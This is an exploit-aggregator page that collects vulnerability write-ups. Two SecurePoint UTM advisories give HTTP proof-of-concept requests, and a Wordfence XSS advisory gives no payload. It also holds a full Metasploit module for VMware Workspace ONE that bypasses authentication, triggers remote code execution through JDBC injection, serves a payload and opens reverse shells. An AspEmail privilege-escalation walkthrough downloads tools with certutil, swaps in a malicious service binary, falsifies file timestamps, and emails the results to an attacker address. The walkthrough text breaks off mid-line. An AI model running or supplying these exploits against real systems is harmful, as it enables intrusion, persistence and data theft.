Latest exploits :: CodePwn

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: SecurePoint UTM Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn Type: Use of Uninitialized Variable [CWE-457] Date found: 2023-01-05 Date published: 2023-04-12 CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) CVE: CVE-2023-22897 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== SecurePoint UTM 12.2.5 SecurePoint UTM 12.2.5 SecurePoint UTM 12.2.4.1 SecurePoint UTM 12.2.4 SecurePoint UTM 12.2.3.4 SecurePoint UTM 12.2.3.3 SecurePoint UTM 12.2.3.2 Reseller Preview SecurePoint UTM 12.2.3.1 Reseller Preview 4. INTRODUCTION =============== With secure networks, home office, site connectivity and the protection of your data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure your networks - with suitable IT security solutions for small and medium-sized businesses for rent, purchase or as a complete service. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The firewall offers an administrative web panel on port 11115 and a user login panel on port 443. Both use the endpoint at "/spcgi.cgi" to perform authentication checks via the "login" command. Once authentication is successful (a low-privileged user account is sufficient), and the returned "sessionid" has never been used in any subsequent request, then the application will return remote memory contents within the sessionid JSON attribute on all subsequent requests (that don't contain the sessionId, hence referring to as "unused"). The leaked memory contents include memory addresses as well as environment variables. This happens because the application doesn't correctly initialize a variable later used in the JSON output referencing the sessionid. Successful exploits can allow an authenticated attacker to leak memory contents, which might contain sensitive information, and help defeat memory protections such as ASLR. 6. PROOF OF CONCEPT =================== First, authenticate using any legitimate user against either the admin panel on port 11115 or the user panel on port 443 by using a single HTTP POST request like the following: POST /spcgi.cgi HTTP/1.1 Host: 192.168.175.1 Content-Length: 100 Accept: */* Content-Type: application/json; charset=UTF-8 User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close {"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"user","pass":"Password"}} This returns a sessionid, which you must not use in subsequent requests. This is important because the exploit won't work if you authenticate using the web interface because the sessionid is immediately "used" in further requests being issued by the application. Then submit any JSON request without a sessionid against the same endpoint, such as: POST /spcgi.cgi HTTP/1.1 Host: 192.168.175.1 Content-Length: 2 Accept: */* Content-Type: application/json; charset=UTF-8 User-Agent: test Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Connection: close {} The remote memory contents are afterward leaked in response to that request within the sessionid JSON attribute. 7. SOLUTION =========== Upgrade to version 12.2.5.1 or newer 8. REPORT TIMELINE ================== 2023-01-04: Discovery of the vulnerability 2023-01-06: Contacted vendor via a known contact 2023-01-06: Vendor response 2023-01-06: Sent full vulnerability details to vendor 2023-01-06: Vendor acknowledged the vulnerability 2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers 2023-01-06: RCE Security agrees to the proposed disclosure date 2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability 2023-01-10: MITRE assigns CVE-2023-22897 2023-04-12: Public disclosure 9. REFERENCES ============== https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: SecurePoint UTM Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200] Date found: 2023-01-05 Date published: 2023-04-11 CVSSv3 Score: 9.0 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) CVE: CVE-2023-22620 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== SecurePoint UTM 12.2.5 SecurePoint UTM 12.2.5 SecurePoint UTM 12.2.4.1 SecurePoint UTM 12.2.4 SecurePoint UTM 12.2.3.4 SecurePoint UTM 12.2.3.3 SecurePoint UTM 12.2.3.2 Reseller Preview SecurePoint UTM 12.2.3.1 Reseller Preview 4. INTRODUCTION =============== With secure networks, home office, site connectivity and the protection of your data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure your networks - with suitable IT security solutions for small and medium-sized businesses for rent, purchase or as a complete service. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The firewall offers an administrative web panel on port 11115 and a user login panel on port 443. Both offer the endpoint at "/spcgi.cgi" which leaks the "sessionid" of the last active authenticated user to any unauthenticated user when the application processes an invalid authentication attempt. However, the attacker needs two more authentication attributes to be able to successfully authenticate using the leaked sessionid: 1. The attacker must have the same REMOTE_ADDR as the user whose sessionid is leaked. This isn't trivial to achieve, but exploitation is easy in configurations where any of the two panels are NAT'ed. 2. The attacker needs to know the User-Agent of the user whose sessionid is leaked. However, since the application does not enforce a rate limit on the authentication endpoint, it is trivially easy to brute-force the User-Agent belonging to the leaked session and then authenticate to the device. As the linked blog post describes, the number of possible User-Agents can be further reduced. Interestingly this exploit works across both authentication panels, so an attacker can also leak the sessionId of an administrator using the user login interface and vice versa. Successful exploits can allow an unauthenticated attacker to authenticate against the administrative interface without knowing the user's password. If the last authenticated user has administrative privileges, this means a complete compromise of the device since it is trivially easy to escalate from admin to root using legitimate features. 6. PROOF OF CONCEPT =================== Wait until a user successfully authenticates against the device and then issue an invalid authentication attempt like: POST /spcgi.cgi HTTP/1.1 Host: 192.168.175.1:11115 Content-Length: 86 Accept: */* Content-Type: application/json; charset=UTF-8 Connection: close {"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}} The application then returns the last active user's sessionid: { "sessionid": "8d4602543120a48a4ec30762c5cad3fa", "mode": "w", "result": { "module": "server", "code": 401, "status": "Unauthorized", "message": "failure: access denied" }, "version": "11.6" } This is also exploitable against the user interface on port 443. 7. SOLUTION =========== Upgrade to version 12.2.5.1 or newer 8. REPORT TIMELINE ================== 2023-01-04: Discovery of the vulnerability 2023-01-04: MITRE assigns CVE-2023-22620 2023-01-05: Contacted vendor via their security@ 2023-01-05: Vendor response 2023-01-05: Sent full vulnerability details to vendor 2023-01-06: Vendor acknowledged the vulnerability 2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers 2023-01-06: RCE Security agrees to the proposed disclosure date 2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability 2023-04-11: Public disclosure 9. REFERENCES ============== https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/ https://github.com/MrTuxracer/advisories </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck class InvalidRequest < StandardError end class InvalidResponse < StandardError end def initialize(info = {}) super( update_info( info, 'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain', 'Description' => %q{ This module combines two vulnerabilities in order achieve remote code execution in the context of the `horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass in OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second vulnerability CVE-2022-22957 is a JDBC injection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker to deserialize arbitrary Java objects which can allow remote code execution. }, 'Author' => [ 'mr_me', # Discovery & PoC 'jheysel-r7' # Metasploit Module ], 'References' => [ ['CVE', '2022-22956'], ['CVE', '2022-22957'], ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'], ['URL', 'https://github.com/sourceincite/hekate/'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'] ], 'DisclosureDate' => '2022-04-06', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X64], 'Privileged' => false, 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => %i[curl wget], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'Payload' => { 'BadChars' => "\x22" }, 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'LPORT' => 5555 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end # The VMware products affected do no expose any version information to unauthenticated users. # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were # patched in the following VMware update: https://kb.vmware.com/s/article/88099 def check @token = get_authentication_token Exploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956') rescue InvalidRequest, InvalidResponse => e return Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}") end # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956). # # Return the authentication token def get_authentication_token oauth_client = ['Service__OAuth2Client', 'acs'].sample res_activation_token = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client), 'method' => 'POST' }) unless res_activation_token raise InvalidRequest, 'No response from the server when requesting an activation token' end unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8' raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token" end activation_token = res_activation_token.get_json_document['activationToken'] res_client_info = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'), 'method' => 'POST', 'Content-Type' => 'application/x-www-form-urlencoded', 'data' => activation_token }) unless res_client_info raise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return' end unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8' raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return" end json_client_info = res_client_info.get_json_document client_id = json_client_info['client_id'] client_secret = json_client_info['client_secret'] print_good("Leaked client_id: #{client_id}") print_good("Leaked client_secret: #{client_secret}") post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}" res_access_token = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'), 'method' => 'POST', 'Content-Type' => 'application/x-www-form-urlencoded', 'data' => post_data }) unless res_access_token raise InvalidRequest, 'No response from the server when requesting the access token' end unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token'] raise InvalidResponse, 'Invalid response from the server when requesting the access token' end res_access_token.get_json_document['access_token'] end # Serve the files for the target machine to download. # If the request to the server ends in .xml the victim is requesting the spring bean generated by payload_xml method. # If the request doesn't in .xml the victim is requesting the linux dropper payload. def on_request_uri(cli, request) vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'") if request.to_s.include?('.xml') vprint_status('Sending XML response: ') send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-strem' }) vprint_status('Response sent') else vprint_status('Sending PAYLOAD: ') send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-strem' }) end end # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim # # Returns an XML document containing the payload. def generate_payload_xml(cmd) bean = '' builder = ::Builder::XmlMarkup.new(target: bean, indent: 2) builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do builder.constructor do builder.list do builder.value('/bin/sh') builder.value('-c') builder.value(cmd) end end end end bean.gsub!('constructor', 'constructor-arg') vprint_status(bean) bean end # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting. def trigger_jdbc_rce(jwt, sub_cmd) # jdbc_uri = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{filename}" jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword" res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'), 'method' => 'POST', 'Content-Type' => 'application/x-www-form-urlencoded', 'Connection' => 'keep-alive', 'cookie' => "HZN=#{jwt}", 'data' => jdbc_uri }) fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}' end def execute_command(cmd, opts = {}) vprint_status("Executing the following command: #{cmd}") @payload_xml = generate_payload_xml(cmd) trigger_jdbc_rce(opts[:jwt], cmd) end # Instruct the user to exploit CVE-2022-22960 def on_new_session(_client) print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell') end def exploit unless @token begin @token = get_authentication_token rescue InvalidRequest => e fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}") rescue InvalidResponse => e fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}") end end @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml' start_service('Path' => "/#{@payload_name}") case target['Type'] when :unix_cmd execute_command(payload.encoded, { jwt: @token }) when :linux_dropper execute_cmdstager({ jwt: @token }) else fail_with(Failure::BadConfig, 'Invalid target specified') end end end </code></pre>

<pre><code>On March 14, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for 2 nearly identical Cross-Site Scripting vulnerabilities in the Weaver Xtreme theme and the Weaver Show Posts plugin, which each have over 10,000 installations. The plugin developer responded the same day and we provided full disclosure. Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 14, 2023. Sites still using the free version of Wordfence received the same protection on April 13, 2023. A patched version of the Weaver Show Posts plugin, 1.7, was released on April 1, 2023, while the patched version 6.2 of the Weaver Xtreme theme became available on April 5, 2023. This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email. Vulnerability Summary From Wordfence Intelligence Description:Weaver Xtreme Theme <= 5.0.7 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name Affected Theme: Weaver Xtreme Theme Slug: weaver-xtreme Affected Versions: <= 5.0.7 CVE ID: CVE-2023-1403 CVSS Score: 6.4 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N Researcher/s: Ramuel Gall Fully Patched Version: 6.2 The Weaver Xtreme theme for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 5.0.7. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Description: Weaver Show Posts <= 1.6 - Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name Affected Plugin: Weaver Show Posts Plugin Slug: show-posts Affected Versions: <= 1.6 CVE ID: CVE-2023-1404 CVSS Score: 6.4 (Medium) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N Researcher/s: Alex Thomas Fully Patched Version: 1.7 The Weaver Show Posts plugin for WordPress is vulnerable to stored Cross-Site Scripting due to insufficient escaping of the profile display name in versions up to, and including, 1.6. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Vulnerability Analysis Both the Weaver Xtreme theme and the Weaver Show Posts plugin contain author attribution functionality that can be used by site visitors to view all posts by a given author. Although the function in question used escaping to prevent Cross-Site Scripting, the order of the functions used meant that the author name was not actually escaped upon output: sprintf This is the sort of mistake that would be very difficult to spot via a manual code review - it looks correct and was almost certainly intended to prevent exactly the sort of issue we found. We only spotted it because one of the author names on our test platform was prepopulated with a Cross-Site Scripting payload, which fired when testing an unrelated issue. The reason this is vulnerable is that the esc_attr function runs before the sprintf function populates the unescaped output of the get_the_author function. The patched version simply escapes the output of get_the_author and then wraps the entire block in wp_kses_post for good measure: fixed This type of vulnerability emphasizes the need for dynamic security testing in addition to code review, as vulnerabilities are often hiding in plain sight. While this type of vulnerability does require a trusted (contributor+) attacker in most configurations to exploit, Cross-Site Scripting can be used to take over a website, for instance, if an administrator views or previews a post by a contributor with malicious JavaScript hidden in their author name. On sites that use contributors, it is required for administrators or editors to review posts by contributors in order to publish them, so this is a genuine risk for sites that make use of this functionality. Disclosure Timeline March 14, 2023 - Two members of our Threat Intelligence team, Ramuel Gall and Alex Thomas, find similar issues in the Weaver Xtreme theme and Weaver Show Posts plugin. Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. We responsibly disclose the plugin to the developer, who responds quickly. April 1, 2023 - The Weaver Show Posts plugin receives a patch in version 1.7. April 5, 2023 - The Weaver Xtreme theme receives a patch in version 6.2. April 13, 2023 - The firewall rule becomes available to all Wordfence users. Conclusion In today’s post, we detailed two flaws in the Weaver Xtreme theme and Weaver Show Posts plugin that enabled authenticated attackers, with at least contributor-level access to a site, to inject JavaScript via their display name which could ultimately lead to complete site compromise. This flaw has been fully patched in version 1.7 of Weaver Show Posts and 6.2 of Weaver Xtreme. We recommend that WordPress users immediately verify that their site has been updated to the latest patched versions available. Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 14, 2023. Sites still using the free version of Wordfence received the same protection on April 13, 2023. If you know a friend or colleague who is using the Weaver Xtreme theme or Weaver Show Posts plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected. If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. Special thanks to Senior Web Application Vulnerability Researcher Alex Thomas for finding the second vulnerability in the Weaver Show Posts plugin shortly after the initial discovery of the Weaver Xtreme theme vulnerability. </code></pre>

<pre><code>#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # # Vendor Homepage: https://www.aspemail.com # # Software Link: https://www.aspemail.com/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # #################################################################################################################### # ================================================================================================================== [+] C:\PenTest>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled # ================================================================================================================== * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe 4400 Persits Software EmailAgent or [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe 4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". * Now we know that AspEmail service is active. # ================================================================================================================== * We will need these: [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1" # ================================================================================================================== [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Name: Persits Software EmailAgent ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run User : LocalSystem ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN IdentityReference : Everyone Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse Status : Unknown UserCanStart : False UserCanStop : False [+] C:\PenTest>del PrivescCheck.ps1 * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks. # ================================================================================================================== # [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail: Access is denied. * We do not have permission to access subdirectories. # ================================================================================================================== [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) DeepSecLab\psacln:(I)(OI)(CI)(N) DeepSecLab\psaadm:(I)(OI)(CI)(N) DeepSecLab\psaadm_users:(I)(OI)(CI)(N) BUILTIN\Administrators:(I)(F) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) NT SERVICE\TrustedInstaller:(I)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) * Unlike other directories, we have full privileges in the "BIN" directory of the service. * This is chmod 0777 - rwxrwxrwx in linux language. # ================================================================================================================== [+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user. # ================================================================================================================== * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory. [+] C:\PenTest>whoami DeepSecLab\Hacker [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker". [+] C:\PenTest>"C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN Successfully processed 1 files; Failed processing 0 files * Ok. All commands resulted successfully. We now have full privileges for this directory. # ================================================================================================================== * Now we will modify the EmailAgent file and inject a self-written malware. * We will be careful not to damage any files while doing this so that all transactions can be easily undone. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== Renamed for EmailAgentPrivESC.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free # ================================================================================================================== * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 24.09.2003 09:21 12.288 EmailAgent.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free [24.09.2003 09:21] 12.288 EmailAgent.exe [24.09.2003 09:21] 167.936 Null.EmailAgent.exe * And time manipulation is over. They look like they were uploaded at the same time long ago. # ================================================================================================================== * Now we check for my malware ownership. [+] C:\PenTest>wmic path Win32_LogicalFileSecuritySetting where Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28 [+] wmic useraccount where sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name Name DeepSecLab\Hacker EmailAgent.exe Owner: DeepSecLab\Hacker # =================================================================================================================# # # #################################################################################################################### # #[EmailAgent.exe]# # #################################################################################################################### # # # * We program this malware in such a way that when the server is reboot(when the services are restarted), # * It will be triggered and execute the codes we want, # * And then send a printout of all this to the email address we specified. # # using System; # using System.Linq; # using System.Text; # using System.Diagnostics; # using System.IO; # using System.Collections; # # namespace CliToolSpace # { # class _Main # { # static void Main(string[] args) # { # Cli commandLine = new Cli(); # commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # commandLine.Execute(); # commandLine.ToFile(@"C:\Windows\Temp\"); # } # } # } # # # # #################################################################################################################### # #[Mail.exe]# # #################################################################################################################### # # # using System; # using System.Net.Mail; # using System.Net; # SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); # var mail = new MailMessage(); # mail.From = new MailAddress("mail@deepseclab.com"); # mail.To.Add("mail@hacker.com"); # mail.Subject = "Trigger Successful!"; # mail.IsBodyHtml = true; # string htmlBody; # htmlBody = "This server has been rebooted."; # mail.Body = htmlBody; # Attachment attachment; # attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # mail.Attachments.Add(attachment); # SmtpServer.Port = 587; # SmtpServer.UseDefaultCredentials = false; # SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); # SmtpServer.EnableSsl = true; # SmtpServer.Timeout = int.MaxValue; # SmtpServer.Send(mail); # # # # #################################################################################################################### # #[Run.bat]# # #################################################################################################################### # # # whoami > 